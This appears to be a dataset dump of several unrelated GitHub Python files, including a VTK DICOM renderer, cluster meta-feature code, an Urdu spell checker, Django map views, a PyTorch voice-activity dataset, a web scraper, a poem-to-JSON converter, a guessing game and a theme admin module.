+{"seq_id":"32946461924","text":"# -*- coding: utf-8 -*-\nimport vtk\nimport os\n\nfolder = os.path.join(os.path.dirname(__file__), \"Marching Man\" )\n\ncolors = vtk.vtkNamedColors()\n\n# DICOM reader\n\nDICOMImageReader = vtk.vtkDICOMImageReader()\nDICOMImageReader.SetDirectoryName(folder)\n#DICOMImageReader.SetFileName(file)\nDICOMImageReader.Update()\n\nimageShift = vtk.vtkImageShiftScale()\nimageShift.SetInputConnection(DICOMImageReader.GetOutputPort())\nimageShift.SetOutputScalarTypeToUnsignedShort()\n\n\nmapper = vtk.vtkGPUVolumeRayCastMapper()\nmapper.SetInputConnection(imageShift.GetOutputPort())\n\n\nvolumeColor = vtk.vtkColorTransferFunction()\nvolumeColor.AddRGBPoint(100, 0.0, 0.0, 0.0)\nvolumeColor.AddRGBPoint(950, 1.0, 0.5, 0.3)\nvolumeColor.AddRGBPoint(1200, 1.0, 0.5, 0.3)\nvolumeColor.AddRGBPoint(1550, 1.0, 1.0, 0.9)\n\nscalarOpacity = vtk.vtkPiecewiseFunction()\nscalarOpacity.AddPoint(100, 0.00)\nscalarOpacity.AddPoint(950, 0.05)\nscalarOpacity.AddPoint(1200, 0.01)\nscalarOpacity.AddPoint(1550, 0.80)\n\nvolumeGradientOpacity = vtk.vtkPiecewiseFunction()\nvolumeGradientOpacity.AddPoint(0, 0.0)\nvolumeGradientOpacity.AddPoint(20, 0.5)\nvolumeGradientOpacity.AddPoint(30, 1.0)\n\n\nvolumeProperty = vtk.vtkVolumeProperty()\nvolumeProperty.SetColor(volumeColor)\nvolumeProperty.SetScalarOpacity(scalarOpacity)\nvolumeProperty.SetGradientOpacity(volumeGradientOpacity)\n\nvolume = vtk.vtkVolume()\nvolume.SetProperty(volumeProperty)\nvolume.SetMapper(mapper)\n\n# renderer\n\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\nren.AddVolume(volume)\nren.SetBackground(colors.GetColor3d(\"SlateGray\"))\nren.GetActiveCamera().SetFocalPoint(0, 0, 0)\nren.GetActiveCamera().SetPosition(0, -1, 0)\nren.GetActiveCamera().SetViewUp(0, 0, -1)\nren.ResetCamera()\nren.GetActiveCamera().Dolly(1.5)\nren.ResetCameraClippingRange()\n\nrenWin.SetSize(640, 
480)\n\nrenWin.Render()\niren.Start()\n\n\n","repo_name":"NajTec/bm","sub_path":"Praktikas/uebung6_2.py","file_name":"uebung6_2.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27481110759","text":"# @Author: Joey Teng\n# @Email: joey.teng.dev@gmail.com\n# @Filename: meta_features.py\n# @Last modified by: Joey Teng\n# @Last modified time: 27-Mar-2018\n\"\"\"Define and calculate meta-features using given clusters.\n\nSee function meta-features()\n\"\"\"\n\nimport collections\nimport itertools\nimport math\n\nimport numpy\n\n\nINFINITESIMAL = 1e-323\n\n\ndef size_versus_number_of_clusters(clusters):\n \"\"\"Calculate the number of clusters respect to each size.\n\n Args:\n clusters (list): list of clusters\n\n Returns:\n dict:\n float: average\n float: standard deviation\n int: range\n dict: stats\n {size (int): quantity (int), ...}\n\n \"\"\"\n stats = collections.defaultdict(int) # default = 0\n sizes = [cluster['size'] for cluster in clusters]\n for cluster in clusters:\n # initial quantity is 0\n stats[cluster['size']] += 1\n\n average = numpy.average(sizes)\n standard_deviation = numpy.std(sizes)\n range_ = max(sizes) - min(sizes)\n\n return {\n 'average': average,\n 'standard deviation': standard_deviation,\n 'range': range_,\n 'stats': stats}\n\n\ndef volume_versus_size(clusters):\n \"\"\"Calculate volume of clusters respect to its size.\n\n Args:\n clusters (list): list of clusters\n\n Returns:\n dict: {size (int): volume (list of floats)}\n\n \"\"\"\n stats = collections.defaultdict(list)\n for cluster in clusters:\n # initial container is empty\n stats[cluster['size']].append(cluster['volume'])\n return stats\n\n\ndef log_volume_versus_size(clusters):\n \"\"\"Calculate log-volume of clusters respect to its size.\n\n Args:\n clusters (list): list of clusters\n\n Returns:\n dict: {size (int): log-volume (list of floats)}\n\n \"\"\"\n stats = collections.defaultdict(list)\n for cluster in clusters:\n # initial container is empty\n stats[cluster['size']].append(cluster['log-volume'])\n return stats\n\n\ndef calculate_inverse_density(cluster):\n \"\"\"Calculate the inverse of Density of a cluster.\n\n inverse of density = volume / size\n\n Args:\n clusters (list): list of clusters\n\n Returns:\n float: inverse of density\n\n \"\"\"\n inverse_density = cluster['volume'] / cluster['size']\n return inverse_density\n\n\ndef inverse_density_distribution(clusters, slots):\n \"\"\"Calculate number of clusters in each inverse of density interval.\n\n [lb - 1 * interval, ... (slots - 1) * interval - hb]\n lb = lower bound\n hb = higher bound\n interval = range / slots = (hb - lb) / slots\n\n Args:\n clusters (list): list of clusters\n slots (int): number of intervals\n\n Returns:\n dict:\n float: interval\n range / slots\n float: average\n numpy.average\n float: standard deviation\n numpy.std\n float: range\n higherbound - lowerbound\n dict: stats\n from lower bound to higher\n {inf: int, n-th slot: int, ...}\n [lb - 1 * interval, ... 
(slots - 1) * interval - hb]\n\n \"\"\"\n inverse_densities = list(map(calculate_inverse_density, clusters))\n\n stats = collections.defaultdict(int)\n interval = None\n lowerbound = INFINITESIMAL\n higherbound = INFINITESIMAL\n if inverse_densities:\n lowerbound = min(inverse_densities)\n higherbound = max(inverse_densities)\n _range = higherbound - lowerbound\n interval = _range / slots\n if math.isclose(interval, 0):\n interval = max(lowerbound, float(1)) # prevent ZeroDivisionError\n\n for inverse_density in inverse_densities:\n try:\n stats[int((inverse_density - lowerbound) / interval)] += 1\n except ZeroDivisionError:\n print(\"Densities: {}\".format(inverse_densities))\n print(\"Volumes: {}\".format(\n list(map(lambda x: x['volume'], clusters))))\n print(\"Size: {}\".format(\n list(map(lambda x: x['size'], clusters))))\n raise ZeroDivisionError(\n \"({} - {}) / {}\".format(\n inverse_density, lowerbound, interval))\n except ValueError as message:\n print(\"Densities: {}\".format(inverse_densities))\n print(\"Volumes: {}\".format(\n list(map(lambda x: x['volume'], clusters))))\n print(\"Size: {}\".format(\n list(map(lambda x: x['size'], clusters))))\n raise ValueError(\n \"({} - {}) / {}\\n{}\".format(\n inverse_density, lowerbound, interval, message))\n\n average = numpy.average(inverse_densities)\n standard_deviation = numpy.std(inverse_densities)\n range_ = higherbound - lowerbound\n\n return {'interval': interval,\n 'min': lowerbound,\n 'average': average,\n 'standard deviation': standard_deviation,\n 'range': range_,\n 'stats': stats}\n\n\ndef calculate_inverse_log_density(cluster):\n \"\"\"Calculate the log of inverse of Density of a cluster.\n\n inverse of density-log = log-volume - ln(size)\n\n Args:\n cluster ():\n\n Returns:\n float: inverse of density-log\n -inf if log-volume = -inf\n\n \"\"\"\n inverse_log_density = cluster['log-volume'] - math.log(cluster['size'])\n return inverse_log_density\n\n\ndef inverse_log_density_distribution(clusters, slots):\n \"\"\"Calculate number of clusters in each inverse of density interval.\n\n inverse_log_density = log-volume - ln(size)\n\n [lb - 1 * interval, ... (slots - 1) * interval - hb]\n lb = lower bound\n hb = higher bound\n interval = range / slots = (hb - lb) / slots\n\n Args:\n clusters (list): list of clusters\n slots (int): number of intervals\n\n Returns:\n dict:\n float: interval\n range / slots\n float: average\n numpy.average\n float: standard deviation\n numpy.std\n float: range\n higherbound - lowerbound\n dict: stats\n from lower bound to higher\n {inf: int, n-th slot: int, ...}\n [lb - 1 * interval, ... 
(slots - 1) * interval - hb]\n\n \"\"\"\n raw_inverse_log_densities = list(\n map(calculate_inverse_log_density, clusters))\n inverse_log_densities = [\n inverse_log_density\n for inverse_log_density in raw_inverse_log_densities\n if math.isfinite(inverse_log_density)]\n\n stats = collections.defaultdict(int)\n interval = None\n lowerbound = INFINITESIMAL\n higherbound = INFINITESIMAL\n if inverse_log_densities:\n lowerbound = min(inverse_log_densities)\n higherbound = max(inverse_log_densities)\n _range = higherbound - lowerbound\n interval = _range / slots\n if math.isclose(interval, 0):\n interval = max(lowerbound, float(1)) # prevent ZeroDivisionError\n\n for inverse_log_density in inverse_log_densities:\n try:\n stats[int((inverse_log_density - lowerbound) / interval)] += 1\n except ZeroDivisionError:\n print(\"Densities: {}\".format(inverse_log_densities))\n print(\"Volumes: {}\".format(\n list(map(lambda x: x['volume'], clusters))))\n print(\"Size: {}\".format(\n list(map(lambda x: x['size'], clusters))))\n raise ZeroDivisionError(\n \"({} - {}) / {}\".format(\n inverse_log_density, lowerbound, interval))\n except ValueError as message:\n print(\"Densities: {}\".format(inverse_log_densities))\n print(\"Volumes: {}\".format(\n list(map(lambda x: x['volume'], clusters))))\n print(\"Size: {}\".format(\n list(map(lambda x: x['size'], clusters))))\n raise ValueError(\n \"({} - {}) / {}\\n{}\".format(\n inverse_log_density, lowerbound, interval, message))\n\n # All spheres with -inf volume\n stats[-1] = len(raw_inverse_log_densities) - len(inverse_log_densities)\n\n average = numpy.average(inverse_log_densities)\n standard_deviation = numpy.std(inverse_log_densities)\n range_ = higherbound - lowerbound\n\n return {'interval': interval,\n 'min': lowerbound,\n 'average': average,\n 'standard deviation': standard_deviation,\n 'range': range_,\n 'stats': stats}\n\n\ndef label_versus_meta_features(clusters, func, *args, **kwargs):\n \"\"\"Calculate meta-features for clusters with each label.\n\n Separate clusters based on label and call the funcitons\n Include a '_population' label which indicate the meta-feature over\n the population regardless of the label\n\n Args:\n clusters (dict): list of clusters with ['label']\n func (function):\n the function that used to calculate the meta-feature required\n\n Returns:\n dict: stats\n {label (label): corresponding meta-feature, ...}\n\n \"\"\"\n _clusters = collections.defaultdict(list)\n _clusters['_population'] = list(itertools.chain(*clusters.values()))\n _clusters.update(clusters.items())\n stats = {}\n for label in _clusters:\n stats[label] = func(_clusters[label], *args, **kwargs)\n return stats\n\n\ndef meta_features(clusters): # TODO\n \"\"\"Calculate all the meta-features defined using clusters calculated.\n\n Args:\n clusters (list): list of clusters\n [{\n 'vertices' (list): vertices\n all the vertices on/defined the hull\n 'points' (list): vertices\n all the instances that are in the hull\n (same label as homogeniety is maintained)\n 'size' (int): the number of instances belong to this hull\n len(vertices) + len(points)\n 'volume' (float):\n the volume in the Euclidean n-dimensional space obtained\n by the hull\n 'label' (int):\n the category that the hull belongs to\n }, ...]\n\n Returns:\n meta-features (dict):\n {\n 'Number of Clusters' (int)\n 'Size versus Number of Clusters' ():\n 'Volume versus Size' ():\n 'Inverse Density distribution over 10 intervals' ():\n }\n\n \"\"\"\n return {'Number of Clusters':\n 
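# Each entry below maps label -> meta-feature value; label_versus_meta_features\n            # also adds a '_population' key aggregated over all labels.\n            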
label_versus_meta_features(clusters, len),\n 'Size versus Number of Clusters':\n label_versus_meta_features(\n clusters, size_versus_number_of_clusters),\n # 'Volume versus Size':\n # label_versus_meta_features(clusters, volume_versus_size),\n 'log-Volume versus Size':\n label_versus_meta_features(clusters, log_volume_versus_size),\n # 'Inverse Density distribution over 10 intervals':\n # label_versus_meta_features(\n # clusters, inverse_density_distribution, 10)\n 'Inverse Log Density distribution over 10 intervals':\n label_versus_meta_features(\n clusters, inverse_log_density_distribution, 10)}\n","repo_name":"JoeyTeng/Algorithm-Selection-for-Classification-Problems-via-Cluster-based-Meta-features","sub_path":"meta_features.py","file_name":"meta_features.py","file_ext":"py","file_size_in_byte":11461,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"21527826098","text":"import re\nimport pandas as pd\n\nfile = open(\"jang.txt\", \"r+\", encoding='utf-8')\nList = file.read()\n\nWordList = []\ncount = 0\nWordName = []\nDict = {}\nword = \"\"\nfor i in List:\n if not (i == ' ' or i == '<' or i == 's' or i == '>' or i == ' ' or i == '/'):\n WordName.append(i)\n else:\n word = \"\"\n for a in WordName:\n word += a\n if word != \"\":\n if word in Dict:\n Dict[word] += 1\n count += 1\n else:\n Dict[word] = 1\n count += 1\n WordList.append(word)\n WordName = []\n # print(i)\n\nprint(Dict)\nprint(count)\n\nprint(WordList)\n\nUnigram={}\nfor w in WordList:\n Unigram[w] = Dict[w] / count\n print(Unigram[w])\n\n\nprint(Unigram)\nBigram = {}\nfor i in range(len(WordList) - 1):\n #print(WordList[i] + \" \" + WordList[i + 1])\n Bigram[WordList[i] + \" \" + WordList[i + 1]] = Unigram[WordList[i]] * Unigram[WordList[i + 1]]\n\nprint(Bigram)\n\n\ndef genedit1(word):\n letters = 'ابپتٹثجچحخدڈذرڑزژسشصضطظعغفقکگلمنوہیے'\n\n insertions = []\n deletions = []\n transpositons = []\n replacements = []\n\n # insert 1 character\n for i in range(len(word) + 1):\n for l in letters:\n insertions.append(word[:i] + l + word[i:])\n\n # delete 1 character\n for i in range(len(word) + 1):\n deletions.append(word[:i - 1] + word[i:])\n\n # replace 1 character\n for i in range(len(word) + 1):\n for l in letters:\n replacements.append(word[:i - 1] + l + word[i:])\n\n # replace 1 character\n\n for i in range(len(word) - 1):\n transpositons.append(word[:i] + (word[i + 1] + word[i]) + word[i + 2:])\n\n return set(insertions + deletions + replacements + transpositons)\n\n\ndef readfile(name):\n file = open(name, \"r+\", encoding='utf-8')\n List = file.read()\n\n WordList = []\n count = 0\n WordName = []\n word = \"\"\n for i in List:\n if not (i == ' ' or i == '<' or i == 's' or i == '>' or i == ' ' or i == '/'):\n WordName.append(i)\n else:\n word = \"\"\n for a in WordName:\n word += a\n if word != \"\":\n WordList.append(word)\n WordName = []\n\n return WordList\n\nerrorList=readfile(\"jang_errors.txt\")\n#print(errorList)\nnonErrorList=readfile(\"jang_nonerrors.txt\")\n#print(nonErrorList)\n\ndef readWordList(name):\n file = open(name, \"r+\", encoding='utf-8')\n List = file.read()\n\n WordList = []\n count = 0\n WordName = []\n word = \"\"\n for i in List:\n if i=='\\n':\n word = \"\"\n for a in WordName:\n\n word += a\n if word != \"\":\n WordList.append(word)\n WordName = []\n else:\n WordName.append(i)\n return WordList\n\nwordList=readWordList(\"wordlist.txt\")\n#print(wordList)\n\nwordList=set(wordList)\nprint(Dict)\n\n\ni=0\nprobabilityList=[]\nWordDict={}\nfor 
word in errorList:\n if word not in wordList:\n wordedit1= genedit1(word)\n candidateset= set()\n for edits in wordedit1:\n candidateset=candidateset.union(genedit1(edits))\n candidateset=candidateset.intersection(wordList)\n\n candwithscore=[]\n for candidate in candidateset:\n if candidate in Unigram:\n unigramscore= Unigram[candidate]\n bigram1=errorList[i-1] + \" \" + candidate\n bigram2=candidate + \" \" + errorList[i+1]\n probability=2*unigramscore\n if bigram1 in Bigram and bigram2 in Bigram:\n bigramscore= Bigram[bigram1] * Bigram[bigram2]\n probability=2*unigramscore+5*bigramscore\n candwithscore.append([probability,candidate])\n else:\n probability=0\n candwithscore.append([probability, candidate])\n df=pd.DataFrame(candwithscore,columns=['probability','candidate'])\n sort = df.sort_values(df.columns[0], ascending=False)\n sort=sort[:10]\n probabilityList.append([sort['candidate'].tolist(),sort['probability'].tolist()])\n sort=sort['candidate'].tolist()\n WordDict[word]=sort\n\n i+=1\n\nprint(WordDict)\nf = open(\"reportfile.txt\", \"a\", encoding='utf-8')\ncount=0\nfor i in range(len(errorList)-1):\n if errorList[i]!=nonErrorList[i]:\n f.write(\"Error=\" + errorList[i] + \" \")\n for k in probabilityList[count]:\n f.write(str(k))\n sortedList=WordDict[errorList[i]]\n for j in sortedList:\n if nonErrorList[i]==j:\n f.write(\" \" + errorList[i]+ \"Error corrected successfully\" + nonErrorList[i])\n f.write(\"\\n\")\n count+=1\n\n\n","repo_name":"haadfida/IRAssignments","sub_path":"Assignment3/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11696007999","text":"from django.shortcuts import redirect, render\nfrom django.views.generic import TemplateView, View\nfrom actors.models import SubZone, Category, Amendity\nfrom django.http import HttpResponse, HttpResponseNotFound\nimport json\n\nclass GetSubzoneScore(View):\n '''\n AJAX call to generate keys\n '''\n\n def get(self, request):\n scores = []\n data = request.GET\n subzone_name = str(data.get('subzone', None))\n try:\n subzone = SubZone.objects.get(name=subzone_name)\n except SubZone.DoesNotExist:\n print(\"SubZone does not exist\")\n return HttpResponseNotFound(content=dict(error_code=404, error_msg=\"Deployment does not exist\"));\n\n try:\n subzone_overall_score = subzone.overall_score\n categories = Category.objects.filter(subzone=subzone)\n\n except (ValueError, TypeError) as e:\n return HttpResponseNotFound(content=dict(error_code=402, error_msg=\"Subzone is invalid\"));\n\n scores = {}\n response_data = {}\n\n scores['overall'] = subzone_overall_score\n for category in categories:\n scores[category.get_category_type_display()] = category.score\n\n response_data = {'name': subzone_name,\n 'scores': scores\n }\n\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n\n\nclass MapView(TemplateView):\n\n template_name = 'pages/map.html'\n\n def get_town_info(self):\n towns = [] \n current_town_name = ''\n subzone_name = ''\n subzone_info = []\n\n subzones = SubZone.objects.all().order_by('town_name', 'name')\n\n print(subzones)\n\n for subzone in subzones:\n if not current_town_name:\n print(\"start town:%s\" % (subzone.get_town_name_display()))\n current_town_name = subzone.get_town_name_display()\n subzone_info.append({'name': subzone.name})\n elif current_town_name != subzone.get_town_name_display():\n print(\"old town %s new town: %s subzone %s\" % 
(current_town_name, subzone.get_town_name_display(), subzone_info))\n towns.append({'name': current_town_name, 'subzones': subzone_info})\n current_town_name = subzone.get_town_name_display()\n subzone_info = []\n subzone_info.append({'name': subzone.name})\n else:\n print(\"adding into same town\")\n subzone_info.append({'name': subzone.name})\n\n towns.append({'name': current_town_name, 'subzones': subzone_info})\n\n return {\n 'towns': towns\n }\n\n def get_context_data(self, **kwargs):\n ctx = super(MapView, self).get_context_data(**kwargs)\n\n towns = self.get_town_info()\n print(towns)\n ctx.update(towns)\n return ctx\n\n def dispatch(self, *args, **kwargs):\n return super(MapView, self).dispatch(*args, **kwargs)","repo_name":"anduslim/hacksg","sub_path":"on_admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72166792107","text":"import os, glob\nimport torch\nimport numpy as np\n\nclass VAD_dataset(torch.utils.data.Dataset):\n def __init__(self, hp,is_train=True) : \n super(VAD_dataset,self).__init__()\n self.hp = hp\n root = hp.data.root\n self.nframe = hp.train.nframe\n self.is_train = is_train\n\n if is_train : \n self.list_path = [x for x in glob.glob(os.path.join(root,'train','*.pt'))]\n else :\n self.list_path = [x for x in glob.glob(os.path.join(root,'test','*.pt'))]\n\n self.true_len = len(self.list_path)\n\n def __getitem__(self,index):\n path_item = self.list_path[index]\n\n # data[\"mel\"] :\n # - [n_mels, n_frame] = [32, 960]\n # - 10ms shift 75% overlap\n # data[\"label\"] :\n # - binary label\n data = torch.load(path_item)\n\n if self.nframe > data[\"mel\"].shape[1]:\n raise Exception(\"ERROR:: nframe is too large | \" +str(self.nframe) +\" > \" + str(data[\"mel\"].shape[1]))\n idx_start = np.random.randint(data[\"mel\"].shape[1]-self.nframe)\n idx_end = idx_start + self.nframe\n\n data[\"mel\"] = data[\"mel\"][:,idx_start:idx_end] \n data[\"mel\"] = torch.unsqueeze(data[\"mel\"],0)\n data[\"label\"] = data[\"label\"][idx_start:idx_end]\n \n if self.hp.model.specaug and self.is_train:\n freq_l = np.random.randint(low=self.hp.specaug.freq_min,high=self.hp.specaug.freq_max)\n freq_s = np.random.randint(low=0,high=self.hp.model.n_mels-freq_l)\n data[\"mel\"][0,freq_s:freq_s+freq_l,:] = 0\n\n shape = data[\"mel\"].shape\n\n if 'd' in self.hp.model.input :\n d = torch.zeros(shape)\n # C, dim, T\n d[:,:-1,:] = data[\"mel\"][0,1:,:]-data[\"mel\"][0,0:-1,:]\n # channel-wise concat\n data[\"mel\"] = torch.cat((data[\"mel\"],d),0)\n \n if 'dd' in self.hp.model.input :\n dd = torch.zeros(shape)\n dd[:,:-2,:] = data[\"mel\"][0,1:-1,:]-data[\"mel\"][0,0:-2,:]\n # channel-wise concat\n data[\"mel\"] = torch.cat((data[\"mel\"],dd),0)\n\n #mel = data[\"mel\"][:,idx_start:idx_end].float()\n #label = data[\"label\"][idx_start:idx_end]\n data[\"label\"] = torch.unsqueeze(data[\"label\"],0)\n\n #if self.hp.model.label == 1:\n # data[\"label\"] = torch.unsqueeze(data[\"label\"],0)\n #elif self.hp.model.label == 2:\n # tmp_label = torch.zeros(2,data[\"label\"].shape[0])\n # tmp_label[0,:] = data[\"label\"]\n # tmp_label[1,:] = (~data[\"label\"].bool()).float()\n # data[\"label\"] = tmp_label\n\n return data[\"mel\"].float(),data[\"label\"]\n #return mel,label\n\n def __len__(self):\n return 
len(self.list_path)","repo_name":"kooBH/VADK","sub_path":"src/VAD_dataset.py","file_name":"VAD_dataset.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71470832748","text":"from bs4 import BeautifulSoup\nimport requests, csv\n\n\nsource = requests.get(\"http://worldstarhiphop.com/videos/\").text\nsoup = BeautifulSoup(source, \"html5lib\")\n\nwith open(\"wshh_scrape.csv\", \"w\") as world:\n csv_file = csv.writer(world)\n csv_file.writerow([\"Index\", \"Description\", \"Link\"])\n for index, char in enumerate(soup.find_all(\"section\", class_ = \"box\"), start = 1):\n try:\n getInfo = char.find(\"img\", class_ = \"lazy\")[\"alt\"]\n getUrl = char.find(\"a\", itemprop = \"url\", class_ = \"video-box\")[\"href\"]\n url = f\"http://www.worldstarhiphop.com{getUrl}\"\n wshh = str(index) + \") \" + \"Description: \" + getInfo + \"\\n\" + url\n print(wshh)\n print(\"\\n\")\n except:\n getInfo = None\n csv_file.writerow([str(index), getInfo, str(url)])\n\n\n ","repo_name":"iryan6627/Scraping","sub_path":"wshhScrape.py","file_name":"wshhScrape.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71901150828","text":"#!/usr/bin/env python3\n\n\"\"\"\nConverts chaos.html into JSON. A sample of the input:\n\n
<xxx1><p><tt>Dearest creature in creation<br/>\nStudying English pronunciation,<br/>\n&nbsp;&nbsp;&nbsp;I will teach you in my verse<br/>\n&nbsp;&nbsp;&nbsp;Sounds like corpse, corps, horse and worse.<br/></tt></p></xxx1>
\n\nA hand-formatted portion of the output (note that indentation, line breaks,\norder of dict entries, etc. don't matter as long as the data matches):\n\n[\n ...\n {\"stanza\": 3,\n \"lines\": [\n {\"lineId\": \"3-1\", \"lineNum\": 1, \"text\": \"Pray, console your loving poet,\",\n \"tokens\": [\"Pray\", \",\", \"console\", \"your\", \"loving\", \"poet\"],\n \"rhymeWords\": [\"poet\"]},\n {\"lineId\": \"3-2\", \"lineNum\": 2, \"text\": \"Make my coat look new, dear, sew it!\",\n \"tokens\": [\"Make\", \"my\", \"coat\", \"look\", \"new\", \",\", \"dear\", \",\", \"sew\", \"it\", \"!\"],\n \"rhymeWords\": [\"sew\", \"it\"]},\n ...\n ]},\n ...\n {\"stanza\": 9,\n \"lines\": [\n {\"lineId\": \"9-1\", \"lineNum\": 1, \"text\": \"From \\\"desire\\\": desirable - admirable from \\\"admire\\\",\",\n \"tokens\": [\"From\", \"``\", \"desire\", \"''\", \":\", \"desirable\", \"-\", \"admirable\", \"from\", \"``\", \"admire\", \"''\", \",\"],\n \"rhymeWords\": [\"admire\"]},\n ...\n ...]},\n]\n\n\"\"\"\n\n\n\nimport urllib, json, requests, os, sys, pprint, re\nfrom bs4 import BeautifulSoup\nfrom nltk import *\nfrom nltk.corpus import cmudict\nimport nltk\nfrom collections import OrderedDict\n\n\ncontainer = []\n\n# def hasalpha(token):\n# return # TODO: whether any character in the token is a letter\n\n# regex that breaks an HTML line into parts: line number within the stanza, main portion, spacing\n# LINE_RE = # TODO:\n\n# TODO: read from chaos.html, construct data structure, write to chaos.json\n\n\n\ndef readfile():\n url = \"http://people.cs.georgetown.edu/nschneid/cosc272/f17/a1/chaos.html\"\n home = requests.get(url)\n html = BeautifulSoup(str(BeautifulSoup(home.content, \"html.parser\")).replace(\"
\", \" \").replace(\"\", \"\").split('
')[0], \"lxml\")\n cleanfile(html)\n\ndef cleanfile(html):\n\n regex = r'<\\/?p>||<\\/?xxx4>|<\\/?xxx3>|<\\/?xxx2>|<\\/?xxx1>|<\\/?tt>|\\\\xa0\\\\xa0\\\\xa0'\n\n for index, stanza in enumerate(html.findAll(\"xxx1\")):\n\n split = str(str(stanza.contents).replace('[','').replace(']','').replace('-',' - ')).split(\"\\\\n\")\n edit = [re.sub(regex, ' ', x).strip() for x in split]\n index+=1\n\n lines = []\n\n for Id, line in enumerate(edit):\n rhymeWords = []\n Id+=1\n lineId = str(index) + '-' + str(Id)\n text = BeautifulSoup(line, \"lxml\").text \n tokens = word_tokenize(line)\n copy = word_tokenize(line)\n copy_tokens = [x.strip() for x in copy if x not in ('<', '>', 'i', '/i')]\n tokens = [x.strip().lower() for x in tokens if x != 'i' and (x.isalpha() or re.match(re.compile('[,|;|-]'), x))]\n\n tokens = tokens[::-1]\n\n if tokens[0] in (',' , ';', '-'): \n del tokens[0] \n\n if '-' in tokens[0]:\n tokens[0] = tokens[0].split('-')[1]\n\n if tokens[0] == 'it':\n rhymeWords.append(tokens[1])\n rhymeWords.append(tokens[0])\n else: \n rhymeWords.append(tokens[0])\n\n lines.append({ \"lineId\" : lineId, \"lineNum\" : Id, \"text\" : text, \"tokens\" : copy_tokens, \"rhymeWords\" : rhymeWords })\n\n data = {\"stanza\" : index, \"lines\" : lines}\n dict(data)\n\ndef dict(data):\n container.append(data)\n\ndef ind(array):\n for i, elem in enumerate(array): \n if elem == 'i':\n return i\n\ndef writeJSON():\n if os.path.exists(\"chaos.json\"):\n f = file(\"chaos.json\", \"r+\")\n else:\n f = file(\"chaos.json\", \"w\")\n j = json.dumps(container, indent=4)\n f.write(j)\n f.close()\n\ndef main():\n readfile() \n writeJSON()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n","repo_name":"derekacosta/NLP","sub_path":"A1 /chaos2json.py","file_name":"chaos2json.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17210631647","text":"import random\n\n\ndef guess(y):\n random_number =random.randint(1,y)\n guess=0\n \n while guess!= random_number:\n guess =int(input(f'Guess a random number from 1 to {y} \\n'))\n if guessrandom_number:\n print(\"too high\")\n \n \n print(f'yay u guessed {random_number}')\n \n \n \ndef computer_guess(x):\n low=1\n high=x\n feedback=''\n \n while feedback!=\"c\":\n if low!= high:\n \n guess=random.randint(low, high)\n else:\n guess=low\n \n feedback=input(f'is {guess} too high (h), too low (l), or correct (c)? ').lower()\n if feedback ==\"h\":\n high=guess -1\n elif feedback==\"l\":\n low=guess+1\n print(f\"yay the computer guessed {guess}\")\n \n \ninitprompt= input(\"Would you like to guess a random number or would you like the computer to guess a number? (me,computer) \").lower()\n\nrange= int(input(\" What is the range of the number? 1-? 
\"))\n\nif initprompt ==\"me\":\n guess(range)\n \nelse:\n computer_guess(range)","repo_name":"PLAyEr2002002/12-beginner-python-projects","sub_path":"number_guesser.py","file_name":"number_guesser.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71265183147","text":"from __future__ import unicode_literals\n\nfrom django.template import engines\nfrom django.utils.translation import ugettext_lazy as _\nfrom django_jinja.backend import Jinja2\n\nfrom shoop.admin.base import AdminModule, MenuEntry, Notification\nfrom shoop.admin.utils.urls import admin_url\nfrom shoop.xtheme._theme import get_current_theme\nfrom shoop.xtheme.engine import XthemeEnvironment\n\n\nclass XthemeAdminModule(AdminModule):\n \"\"\"\n Admin module for Xtheme.\n\n Allows theme activation/deactivation and further configuration.\n \"\"\"\n name = _(\"Shoop Extensible Theme Engine\")\n breadcrumbs_menu_entry = MenuEntry(_(\"Themes\"), \"shoop_admin:xtheme.config\")\n\n def get_urls(self): # doccov: ignore\n return [\n admin_url(\n \"^xtheme/(?P.+?)/\",\n \"shoop.xtheme.admin_module.views.ThemeConfigDetailView\",\n name=\"xtheme.config_detail\"\n ),\n admin_url(\n \"^xtheme/\",\n \"shoop.xtheme.admin_module.views.ThemeConfigView\",\n name=\"xtheme.config\"\n )\n ]\n\n def get_menu_category_icons(self):\n return {self.name: \"fa fa-paint-brush\"}\n\n def get_menu_entries(self, request): # doccov: ignore\n return [\n MenuEntry(\n text=_(\"Themes\"), icon=\"fa fa-paint-brush\",\n url=\"shoop_admin:xtheme.config\",\n category=self.name\n )\n ]\n\n def get_notifications(self, request):\n try:\n engine = engines[\"jinja2\"]\n except KeyError:\n engine = None\n\n if engine and isinstance(engine, Jinja2): # The engine is what we expect...\n if isinstance(engine.env, XthemeEnvironment): # ... and it's capable of loading themes...\n if not get_current_theme(request): # ... but there's no theme active?!\n # Panic!\n yield Notification(\n text=_(\"No theme is active. 
